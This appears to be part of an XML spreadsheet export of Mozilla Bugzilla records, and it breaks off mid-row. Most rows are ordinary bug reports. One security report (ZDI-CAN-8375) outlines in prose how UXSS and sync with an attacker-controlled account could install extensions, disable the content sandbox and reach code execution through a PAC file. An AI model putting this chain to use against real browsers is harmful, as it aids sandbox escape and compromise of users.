      <c r="T2182" t="n">
        <v>1</v>
      </c>
      <c r="U2182" t="n">
        <v>0</v>
      </c>
      <c r="V2182" t="n">
        <v>50</v>
      </c>
      <c r="W2182" t="inlineStr">
        <is>
          <t>1. Visit https://dl.dropboxusercontent.com/u/40949268/emcc/bugs/Tests_d_crashes/Tests_d.html
Observed: Web page crashes to desktop. See traces
https://crash-stats.mozilla.com/report/index/2f8f3cc4-f715-4961-835c-190282140125
https://crash-stats.mozilla.com/report/index/67e3f68d-8e07-4aa3-8f2d-171622140125
Reproduced on newest Macbook Pro line laptop running Windows 8.1 in bootcamp. Did not reproduce on a two year old Macbook Air line laptop running Windows 7 in bootcamp.</t>
        </is>
      </c>
      <c r="X2182" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2183">
      <c r="A2183" t="n">
        <v>430399</v>
      </c>
      <c r="B2183" t="inlineStr">
        <is>
          <t>2008-04-22 20:41:57 -0700</t>
        </is>
      </c>
      <c r="C2183" t="inlineStr">
        <is>
          <t>vfychain -pp crashes</t>
        </is>
      </c>
      <c r="D2183" t="inlineStr">
        <is>
          <t>2008-04-26 19:03:11 -0700</t>
        </is>
      </c>
      <c r="E2183" t="n">
        <v>1</v>
      </c>
      <c r="F2183" t="n">
        <v>1</v>
      </c>
      <c r="G2183" t="n">
        <v>3</v>
      </c>
      <c r="H2183" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2183" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J2183" t="inlineStr">
        <is>
          <t>Tools</t>
        </is>
      </c>
      <c r="K2183" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L2183" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2183" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2183" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2183" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2183" t="inlineStr">
        <is>
          <t>PKIXTEST</t>
        </is>
      </c>
      <c r="Q2183" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2183" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2183" t="inlineStr">
        <is>
          <t>3.12.1</t>
        </is>
      </c>
      <c r="T2183" t="n">
        <v>1</v>
      </c>
      <c r="U2183" t="n">
        <v>0</v>
      </c>
      <c r="V2183" t="n">
        <v>5</v>
      </c>
      <c r="W2183" t="inlineStr">
        <is>
          <t>Created attachment 317178
zip file of DER cert files to reproduce this bug
I have a chain of test certs. 3 certs (EE, intermediate, root CA) in 3 files.
If I use the command 
 vfychain -d empty -pvv BridgeUser1cert.der NavyBridgecert.der -t ArmyRoot.der
to validate the chain, it crashes.  
The cause is the same as the cause of bug 428038, namely a crash in 
cert_pkixDestroyValOutParam when the ValOutParams block has not been 
initialized to zeros.  We do want to fix that in the library, but the 
patch is not ready.  In the mean time, I have a fix for vfychain.c that
I will attach.  It simply initializes the valOutParams.</t>
        </is>
      </c>
      <c r="X2183" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2184">
      <c r="A2184" t="n">
        <v>1439684</v>
      </c>
      <c r="B2184" t="inlineStr">
        <is>
          <t>2018-02-20 10:34:50 -0800</t>
        </is>
      </c>
      <c r="C2184" t="inlineStr">
        <is>
          <t>Add caching to NewTabUtils for saved to Pocket items</t>
        </is>
      </c>
      <c r="D2184" t="inlineStr">
        <is>
          <t>2019-06-28 14:29:46 -0700</t>
        </is>
      </c>
      <c r="E2184" t="n">
        <v>1</v>
      </c>
      <c r="F2184" t="n">
        <v>1</v>
      </c>
      <c r="G2184" t="n">
        <v>2</v>
      </c>
      <c r="H2184" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2184" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2184" t="inlineStr">
        <is>
          <t>New Tab Page</t>
        </is>
      </c>
      <c r="K2184" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L2184" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2184" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2184" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2184" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2184" t="inlineStr"/>
      <c r="Q2184" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2184" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2184" t="inlineStr">
        <is>
          <t>Firefox 60</t>
        </is>
      </c>
      <c r="T2184" t="n">
        <v>1</v>
      </c>
      <c r="U2184" t="n">
        <v>0</v>
      </c>
      <c r="V2184" t="n">
        <v>12</v>
      </c>
      <c r="W2184" t="inlineStr">
        <is>
          <t>As discussed on irc with Mardak, we'll want to add a pocket in-memory cache to NewTabUtils with various pocket wrappers (save, delete, archive) expiring the cache as well as expiring after an hour. HighlightsFeed will just always call without excludePocket.</t>
        </is>
      </c>
      <c r="X2184" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2185">
      <c r="A2185" t="n">
        <v>1156861</v>
      </c>
      <c r="B2185" t="inlineStr">
        <is>
          <t>2015-04-21 10:21:24 -0700</t>
        </is>
      </c>
      <c r="C2185" t="inlineStr">
        <is>
          <t>crash in mozilla::plugins::PluginProcessParent::RunLaunchCompleteTask()</t>
        </is>
      </c>
      <c r="D2185" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E2185" t="n">
        <v>1</v>
      </c>
      <c r="F2185" t="n">
        <v>1</v>
      </c>
      <c r="G2185" t="n">
        <v>6</v>
      </c>
      <c r="H2185" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2185" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J2185" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K2185" t="inlineStr">
        <is>
          <t>39 Branch</t>
        </is>
      </c>
      <c r="L2185" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2185" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N2185" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2185" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2185" t="inlineStr">
        <is>
          <t>[adv-main39+][adv-esr38.1+]</t>
        </is>
      </c>
      <c r="Q2185" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2185" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2185" t="inlineStr">
        <is>
          <t>mozilla41</t>
        </is>
      </c>
      <c r="T2185" t="n">
        <v>1</v>
      </c>
      <c r="U2185" t="n">
        <v>0</v>
      </c>
      <c r="V2185" t="n">
        <v>20</v>
      </c>
      <c r="W2185" t="inlineStr">
        <is>
          <t>[Tracking Requested - why for this release]: topcrash
This bug was filed from the Socorro interface and is 
report bp-3c210213-ad9d-4412-b227-c98062150412.
=============================================================
Looks like a recent regression - first reported crash is in build 2015041100.
Currently #40 topcrash in 39.0a2.  Most crashes have:
EXCEPTION_ACCESS_VIOLATION_READ  0x5a5a5a5a
so filing it security-sensitive just in case.</t>
        </is>
      </c>
      <c r="X2185" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2186">
      <c r="A2186" t="n">
        <v>791597</v>
      </c>
      <c r="B2186" t="inlineStr">
        <is>
          <t>2012-09-16 17:32:36 -0700</t>
        </is>
      </c>
      <c r="C2186" t="inlineStr">
        <is>
          <t>Dragging and dropping URLs leads to address bar spoofing</t>
        </is>
      </c>
      <c r="D2186" t="inlineStr">
        <is>
          <t>2020-04-08 13:04:45 -0700</t>
        </is>
      </c>
      <c r="E2186" t="n">
        <v>1</v>
      </c>
      <c r="F2186" t="n">
        <v>1</v>
      </c>
      <c r="G2186" t="n">
        <v>2</v>
      </c>
      <c r="H2186" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2186" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2186" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K2186" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2186" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2186" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2186" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2186" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2186" t="inlineStr">
        <is>
          <t>[adv-main52+]</t>
        </is>
      </c>
      <c r="Q2186" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2186" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2186" t="inlineStr">
        <is>
          <t>Firefox 53</t>
        </is>
      </c>
      <c r="T2186" t="n">
        <v>1</v>
      </c>
      <c r="U2186" t="n">
        <v>0</v>
      </c>
      <c r="V2186" t="n">
        <v>20</v>
      </c>
      <c r="W2186" t="inlineStr">
        <is>
          <t>Demo: http://lcamtuf.coredump.cx/urldrag/</t>
        </is>
      </c>
      <c r="X2186" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2187">
      <c r="A2187" t="n">
        <v>715319</v>
      </c>
      <c r="B2187" t="inlineStr">
        <is>
          <t>2012-01-04 13:44:21 -0800</t>
        </is>
      </c>
      <c r="C2187" t="inlineStr">
        <is>
          <t>More multi-octet encoding issues</t>
        </is>
      </c>
      <c r="D2187" t="inlineStr">
        <is>
          <t>2012-10-18 01:41:33 -0700</t>
        </is>
      </c>
      <c r="E2187" t="n">
        <v>1</v>
      </c>
      <c r="F2187" t="n">
        <v>1</v>
      </c>
      <c r="G2187" t="n">
        <v>3</v>
      </c>
      <c r="H2187" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2187" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2187" t="inlineStr">
        <is>
          <t>Internationalization</t>
        </is>
      </c>
      <c r="K2187" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2187" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2187" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2187" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2187" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2187" t="inlineStr">
        <is>
          <t>[sg:high/moderate][qa+:ashughes]</t>
        </is>
      </c>
      <c r="Q2187" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2187" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2187" t="inlineStr">
        <is>
          <t>mozilla14</t>
        </is>
      </c>
      <c r="T2187" t="n">
        <v>1</v>
      </c>
      <c r="U2187" t="n">
        <v>0</v>
      </c>
      <c r="V2187" t="n">
        <v>69</v>
      </c>
      <c r="W2187" t="inlineStr">
        <is>
          <t>Since this seems to be the same kind of issues as bug 690225 marking it security sensitive for now.
In euc-jp 0x8F "eats" the next two octets.
In hz-gb-2312 anything above 0x7E will eat the next octet. (Every other implementation of hz-gb-2312 I have seen just replaces each octet above 0x7E with U+FFFD by the way.)
I have not really done extensive research, but I suspect there is more.</t>
        </is>
      </c>
      <c r="X2187" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2188">
      <c r="A2188" t="n">
        <v>1254819</v>
      </c>
      <c r="B2188" t="inlineStr">
        <is>
          <t>2016-03-08 19:49:08 -0800</t>
        </is>
      </c>
      <c r="C2188" t="inlineStr">
        <is>
          <t>Implement the programs page</t>
        </is>
      </c>
      <c r="D2188" t="inlineStr">
        <is>
          <t>2016-03-15 08:54:18 -0700</t>
        </is>
      </c>
      <c r="E2188" t="n">
        <v>1</v>
      </c>
      <c r="F2188" t="n">
        <v>1</v>
      </c>
      <c r="G2188" t="n">
        <v>6</v>
      </c>
      <c r="H2188" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2188" t="inlineStr">
        <is>
          <t>Connected Devices Graveyard</t>
        </is>
      </c>
      <c r="J2188" t="inlineStr">
        <is>
          <t>Project Sensor Web</t>
        </is>
      </c>
      <c r="K2188" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2188" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2188" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2188" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2188" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2188" t="inlineStr">
        <is>
          <t>sensorweb-frontend</t>
        </is>
      </c>
      <c r="Q2188" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2188" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2188" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2188" t="n">
        <v>1</v>
      </c>
      <c r="U2188" t="n">
        <v>0</v>
      </c>
      <c r="V2188" t="n">
        <v>4</v>
      </c>
      <c r="W2188" t="inlineStr">
        <is>
          <t>Implement the Programs page.</t>
        </is>
      </c>
      <c r="X2188" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2189">
      <c r="A2189" t="n">
        <v>39813</v>
      </c>
      <c r="B2189" t="inlineStr">
        <is>
          <t>2000-05-18 18:58:13 -0700</t>
        </is>
      </c>
      <c r="C2189" t="inlineStr">
        <is>
          <t>search panel problems(no scrollbars or column header for engines panel)</t>
        </is>
      </c>
      <c r="D2189" t="inlineStr">
        <is>
          <t>2008-07-31 01:19:04 -0700</t>
        </is>
      </c>
      <c r="E2189" t="n">
        <v>1</v>
      </c>
      <c r="F2189" t="n">
        <v>1</v>
      </c>
      <c r="G2189" t="n">
        <v>2</v>
      </c>
      <c r="H2189" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2189" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J2189" t="inlineStr">
        <is>
          <t>Search</t>
        </is>
      </c>
      <c r="K2189" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2189" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2189" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2189" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2189" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2189" t="inlineStr">
        <is>
          <t>[nsbeta2-]</t>
        </is>
      </c>
      <c r="Q2189" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2189" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2189" t="inlineStr">
        <is>
          <t>M18</t>
        </is>
      </c>
      <c r="T2189" t="n">
        <v>1</v>
      </c>
      <c r="U2189" t="n">
        <v>0</v>
      </c>
      <c r="V2189" t="n">
        <v>14</v>
      </c>
      <c r="W2189" t="inlineStr">
        <is>
          <t>Ben, it looks like your last change to "search-panel.xul" causes the column 
header for search engines (when in non-beginner mode) to not be shown.  Please 
fix!  The column titles are important, both for sorting as well as for 
distinguishing search engines from search results.</t>
        </is>
      </c>
      <c r="X2189" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2190">
      <c r="A2190" t="n">
        <v>316186</v>
      </c>
      <c r="B2190" t="inlineStr">
        <is>
          <t>2005-11-12 07:33:10 -0800</t>
        </is>
      </c>
      <c r="C2190" t="inlineStr">
        <is>
          <t>Crash when I view source of this XML page [@ CViewSourceHTML::WriteTag]</t>
        </is>
      </c>
      <c r="D2190" t="inlineStr">
        <is>
          <t>2011-06-09 14:58:42 -0700</t>
        </is>
      </c>
      <c r="E2190" t="n">
        <v>1</v>
      </c>
      <c r="F2190" t="n">
        <v>1</v>
      </c>
      <c r="G2190" t="n">
        <v>3</v>
      </c>
      <c r="H2190" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2190" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2190" t="inlineStr">
        <is>
          <t>DOM: HTML Parser</t>
        </is>
      </c>
      <c r="K2190" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2190" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2190" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2190" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2190" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2190" t="inlineStr"/>
      <c r="Q2190" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2190" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2190" t="inlineStr">
        <is>
          <t>mozilla1.9alpha1</t>
        </is>
      </c>
      <c r="T2190" t="n">
        <v>1</v>
      </c>
      <c r="U2190" t="n">
        <v>0</v>
      </c>
      <c r="V2190" t="n">
        <v>9</v>
      </c>
      <c r="W2190" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20051112 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20051112 Firefox/1.6a1
When attempting to view the source of this online Subversion repository viewer (which uses XSLT the last time I was able to check), Firefox dies.
Reproducible: Always
Steps to Reproduce:
1. Go to URL
2. Ctrl+U (or just View-&gt;Page Source)
Actual Results:  
Firefox go boom
Expected Results:  
Firefox shows a sexy output of XML with many pretty colours</t>
        </is>
      </c>
      <c r="X2190" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2191">
      <c r="A2191" t="n">
        <v>1538008</v>
      </c>
      <c r="B2191" t="inlineStr">
        <is>
          <t>2019-03-21 14:30:50 -0700</t>
        </is>
      </c>
      <c r="C2191" t="inlineStr">
        <is>
          <t>[ ZDI-CAN-8375] UXSS priv-esc via sync (install arbitrary extensions &amp; set arbitrary preferences)</t>
        </is>
      </c>
      <c r="D2191" t="inlineStr">
        <is>
          <t>2021-10-20 13:25:33 -0700</t>
        </is>
      </c>
      <c r="E2191" t="n">
        <v>1</v>
      </c>
      <c r="F2191" t="n">
        <v>1</v>
      </c>
      <c r="G2191" t="n">
        <v>2</v>
      </c>
      <c r="H2191" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2191" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2191" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K2191" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2191" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2191" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2191" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2191" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2191" t="inlineStr">
        <is>
          <t>[adv-main69+][adv-esr68.1+][adv-esr60.9+][do not publish until Bug 1538015 is shipped.]</t>
        </is>
      </c>
      <c r="Q2191" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2191" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2191" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2191" t="n">
        <v>1</v>
      </c>
      <c r="U2191" t="n">
        <v>0</v>
      </c>
      <c r="V2191" t="n">
        <v>38</v>
      </c>
      <c r="W2191" t="inlineStr">
        <is>
          <t># UXSS -&gt; privesc via sync (install arbitrary extensions &amp; set arbitrary preferences)
RCE in the Firefox renderer can be turned into UXSS via renderer patches (see
my Pwn2Own exploit).
Now login in to sync via UXSS on
https://accounts.firefox.com/signin?service=sync&amp;context=fx_desktop_v3&amp;entrypoint=menupanel
(this can probably be achieved via XPCOM but this is the easiest way to
do it). This lets you sync the victim browser with an attacker-controlled
account, leading immediately to:
1. Privesc to web extension
2. Arbitrary preference write by setting services.sync.prefs.sync.&lt;pref&gt; = true
    * On Linux: security.sandbox.content.level = 0 -&gt; Boom, no sandbox!
      (on Windows + macOS we are capped at 1, but we can at least bypass the
      desktop &amp; job lockdown)
    * browser.tabs.remote.autostart -&gt; turning this off disables e10s, but only after a restart
    * browser.download.{dir,useDownloadDir} -&gt; probably arbitrary file write, have not tested this
    * network.proxy.autoconfig_url = &lt;path to PAC file&gt;, network.proxy.type = 2,
      This script will be evaluated in browser process, so we can chain with a
      Spidermonkey exploit (such as the one I used at Pwn2Own)
I'm sure there is other interesting settings which lead to a full sandbox escape.</t>
        </is>
      </c>
      <c r="X2191" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2192">
      <c r="A2192" t="n">
        <v>1083431</v>
      </c>
      <c r="B2192" t="inlineStr">
        <is>
          <t>2014-10-15 13:11:09 -0700</t>
        </is>
      </c>
      <c r="C2192" t="inlineStr">
        <is>
          <t>Add API to consume notifications</t>
        </is>
      </c>
      <c r="D2192" t="inlineStr">
        <is>
          <t>2015-02-02 16:48:18 -0800</t>
        </is>
      </c>
      <c r="E2192" t="n">
        <v>1</v>
      </c>
      <c r="F2192" t="n">
        <v>1</v>
      </c>
      <c r="G2192" t="n">
        <v>5</v>
      </c>
      <c r="H2192" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2192" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J2192" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2192" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2192" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2192" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2192" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2192" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2192" t="inlineStr">
        <is>
          <t>u=contributor c=general p=2 s=2015.2</t>
        </is>
      </c>
      <c r="Q2192" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2192" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2192" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2192" t="n">
        <v>1</v>
      </c>
      <c r="U2192" t="n">
        <v>0</v>
      </c>
      <c r="V2192" t="n">
        <v>3</v>
      </c>
      <c r="W2192" t="inlineStr">
        <is>
          <t>This bug covers adding a consumer of the django-notification models that can be interacted with via API.</t>
        </is>
      </c>
      <c r="X2192" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2193">
      <c r="A2193" t="n">
        <v>1352477</v>
      </c>
      <c r="B2193" t="inlineStr">
        <is>
          <t>2017-03-31 09:48:06 -0700</t>
        </is>
      </c>
      <c r="C2193" t="inlineStr">
        <is>
          <t>taskgraph ignores run-on-project for fennec-nightlies</t>
        </is>
      </c>
      <c r="D2193" t="inlineStr">
        <is>
          <t>2018-01-05 13:21:07 -0800</t>
        </is>
      </c>
      <c r="E2193" t="n">
        <v>1</v>
      </c>
      <c r="F2193" t="n">
        <v>1</v>
      </c>
      <c r="G2193" t="n">
        <v>5</v>
      </c>
      <c r="H2193" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2193" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2193" t="inlineStr">
        <is>
          <t>Release Automation: Other</t>
        </is>
      </c>
      <c r="K2193" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2193" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2193" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2193" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2193" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2193" t="inlineStr"/>
      <c r="Q2193" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2193" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2193" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2193" t="n">
        <v>1</v>
      </c>
      <c r="U2193" t="n">
        <v>0</v>
      </c>
      <c r="V2193" t="n">
        <v>12</v>
      </c>
      <c r="W2193" t="inlineStr">
        <is>
          <t>Bug 1317783 showed that even though push-apk specifies "run-on-project" to exclude mozilla-central, it does get included in the central nightly graph.</t>
        </is>
      </c>
      <c r="X2193" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2194">
      <c r="A2194" t="n">
        <v>19165</v>
      </c>
      <c r="B2194" t="inlineStr">
        <is>
          <t>1999-11-17 20:40:43 -0800</t>
        </is>
      </c>
      <c r="C2194" t="inlineStr">
        <is>
          <t>[DOGFOOD][PP] Win32 - App won't start with old MSVCRT.DLL</t>
        </is>
      </c>
      <c r="D2194" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E2194" t="n">
        <v>1</v>
      </c>
      <c r="F2194" t="n">
        <v>1</v>
      </c>
      <c r="G2194" t="n">
        <v>2</v>
      </c>
      <c r="H2194" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2194" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J2194" t="inlineStr">
        <is>
          <t>Installer</t>
        </is>
      </c>
      <c r="K2194" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2194" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2194" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N2194" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2194" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2194" t="inlineStr">
        <is>
          <t>[PDT+] Fix available, need build team help</t>
        </is>
      </c>
      <c r="Q2194" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2194" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2194" t="inlineStr">
        <is>
          <t>M13</t>
        </is>
      </c>
      <c r="T2194" t="n">
        <v>1</v>
      </c>
      <c r="U2194" t="n">
        <v>0</v>
      </c>
      <c r="V2194" t="n">
        <v>137</v>
      </c>
      <c r="W2194" t="inlineStr">
        <is>
          <t>Overview Description:
Cannot install daily seamonkey build due to crash on profile creation.  Both new
and migrating causes a problem.
Steps to Reproduce:
1) Download commercial 1999-11-17-17-M12/ build on WinNT machine.
2) Start installation process
3) Select to migrate a profile or create a new one.
Actual Results:
Crash in Dr. Watson.  Talkback window comes up.
Expected Results:
Installation to complete, and ability to use product.
Build Date &amp; Platform Bug Found:
1999-11-17-17-M12/ - WinNT
Additional Builds and Platforms Tested On:
None
Additional Information:
See leger for more info</t>
        </is>
      </c>
      <c r="X2194" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2195">
      <c r="A2195" t="n">
        <v>1254106</v>
      </c>
      <c r="B2195" t="inlineStr">
        <is>
          <t>2016-03-07 05:15:16 -0800</t>
        </is>
      </c>
      <c r="C2195" t="inlineStr">
        <is>
          <t>Assertion failure: offset_ == offset (offset fits in 31 bits), at js/src/jit/Label.h:56</t>
        </is>
      </c>
      <c r="D2195" t="inlineStr">
        <is>
          <t>2017-01-05 09:13:18 -0800</t>
        </is>
      </c>
      <c r="E2195" t="n">
        <v>1</v>
      </c>
      <c r="F2195" t="n">
        <v>1</v>
      </c>
      <c r="G2195" t="n">
        <v>3</v>
      </c>
      <c r="H2195" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2195" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2195" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2195" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2195" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M2195" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2195" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2195" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2195" t="inlineStr">
        <is>
